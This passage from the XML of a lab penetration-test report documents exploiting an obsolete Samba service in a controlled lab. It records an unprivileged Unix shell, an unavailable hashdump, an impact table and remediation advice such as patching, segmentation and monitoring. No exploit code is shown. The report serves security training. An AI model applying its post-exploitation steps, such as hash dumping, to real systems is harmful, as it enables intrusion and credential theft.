            <wp:docPr id="19399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16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B3B7" w14:textId="77777777" w:rsidR="00F5439F" w:rsidRDefault="00F5439F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27130F3C" w14:textId="77777777" w:rsidR="00F5439F" w:rsidRDefault="00F5439F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFD0978" w14:textId="7B9F3DCE" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-09 — hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6104A0" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Hash retrieval evidence, if performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84A631" w14:textId="77777777" w:rsidR="005860FE" w:rsidRDefault="005860FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0392DEEF" wp14:editId="25044D93">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="49275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57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4704" w14:textId="77777777" w:rsidR="005860FE" w:rsidRDefault="005860FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285CE2EB" w14:textId="2EE892E6" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-10 — Final summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A2CA3" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Final exploitation and impact summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EB774" w14:textId="77777777" w:rsidR="005860FE" w:rsidRPr="005860FE" w:rsidRDefault="005860FE" w:rsidP="00476664">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00476664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session </w:t>
      </w:r>
      <w:r w:rsidRPr="005860FE">
        <w:t>Type: Unix command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F509018" w14:textId="77777777" w:rsidR="005860FE" w:rsidRPr="005860FE" w:rsidRDefault="005860FE" w:rsidP="00476664">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00476664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sysinfo:</w:t>
      </w:r>
      <w:r w:rsidRPr="005860FE">
        <w:t xml:space="preserve"> Not available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4AFFA" w14:textId="77777777" w:rsidR="005860FE" w:rsidRPr="005860FE" w:rsidRDefault="005860FE" w:rsidP="00476664">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00476664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:r w:rsidRPr="005860FE">
        <w:t>: Not available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECFD9B1" w14:textId="77777777" w:rsidR="005860FE" w:rsidRPr="005860FE" w:rsidRDefault="005860FE" w:rsidP="00476664">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00476664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason:</w:t>
      </w:r>
      <w:r w:rsidRPr="005860FE">
        <w:t xml:space="preserve"> The obtained session is a basic Unix shell rather than a Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0EACE" w14:textId="77777777" w:rsidR="005860FE" w:rsidRDefault="005860FE" w:rsidP="00476664">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System validation</w:t>
      </w:r>
      <w:r w:rsidRPr="005860FE">
        <w:t>: Performed using whoami, id, hostname, and uname -a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B3431" w14:textId="5AFCB07C" w:rsidR="00864321" w:rsidRDefault="00000000" w:rsidP="005860FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. 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64321" w14:paraId="5C84AB8E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="747E3782" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2924596F" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Observed/Relevant Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7287BDAE" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Assessment Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864321" w14:paraId="75FC1D9E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B63D6D" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="325F6C72" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Potential loss of confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11D00FD5" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>System access and credential-hash exposure can expose protected information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864321" w14:paraId="0E187E51" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64091BED" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C8131BB" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Potential unauthorized modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="135DBC96" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>A privileged shell could permit changes to system files/configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864321" w14:paraId="76D37591" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB2A943" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D146640" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Potential service/system disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A38935" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Privileged access can enable disruptive actions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864321" w14:paraId="669CC9AA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2952282C" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDBFA6C" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Password hashes may be exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4522E44A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>hashdump is a sensitive post-exploitation action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864321" w14:paraId="7A8EDF3C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F17658" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Attacker Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7555E3E9" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Command execution on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B154898" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
            <w:r>
              <w:t>The lab demonstrates how an exploitable service can lead to system access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64ACD057" w14:textId="77777777" w:rsidR="004C20E7" w:rsidRDefault="004C20E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5616EFEA" w14:textId="59E5EC73" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Remediation and Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FECC3C" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade or remove vulnerable/obsolete Samba software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EDE6AC" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Disable unnecessary services rather than leaving them exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB73C42" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict SMB/Samba access with firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F9FD8" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Segment vulnerable legacy systems from trusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF40294" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Apply security patches and maintain supported software versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213AAD3" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor unusual SMB/Samba activity and use intrusion-detection controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D504C" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Apply least-privilege principles to reduce the impact of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E3FCF" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Use authentication and access controls appropriate to the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C755621" w14:textId="4EB6DCDB" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0093449D">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75FDD7" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The controlled lab demonstrates the professional progression from vulnerability identification to exploitation validation and security-impact analysis. The key remediation objective is to remove or patch obsolete vulnerable Samba software and reduce exposure through network controls, segmentation, least privilege, and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0086432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610435">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1050806710">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="936406376">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="825365952">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1373731442">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="709962128">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1588267918">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="761799886">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="182681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7D6"/>
    <w:rsid w:val="000A6A7C"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003B4705"/>
    <w:rsid w:val="00406BB6"/>
    <w:rsid w:val="00407258"/>
    <w:rsid w:val="0041391C"/>
    <w:rsid w:val="00476664"/>
    <w:rsid w:val="004871FF"/>
    <w:rsid w:val="004C20E7"/>
    <w:rsid w:val="005860FE"/>
    <w:rsid w:val="005A403E"/>
    <w:rsid w:val="006509B6"/>
    <w:rsid w:val="006B1AAE"/>
    <w:rsid w:val="007B5EF7"/>
    <w:rsid w:val="00846547"/>
    <w:rsid w:val="00864321"/>
    <w:rsid w:val="008A0921"/>
    <w:rsid w:val="00914168"/>
    <w:rsid w:val="0093449D"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CB1EBE"/>
    <w:rsid w:val="00CB606F"/>
    <w:rsid w:val="00CF5A93"/>
    <w:rsid w:val="00D27F43"/>
    <w:rsid w:val="00EB43EA"/>
    <w:rsid w:val="00EC4590"/>
    <w:rsid w:val="00EE1A85"/>
    <w:rsid w:val="00F54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B60CB"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{8DC181A4-2CDA-49BF-8A0D-3BFA4421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Giridhari Gopal Goswami</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-15T23:24:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>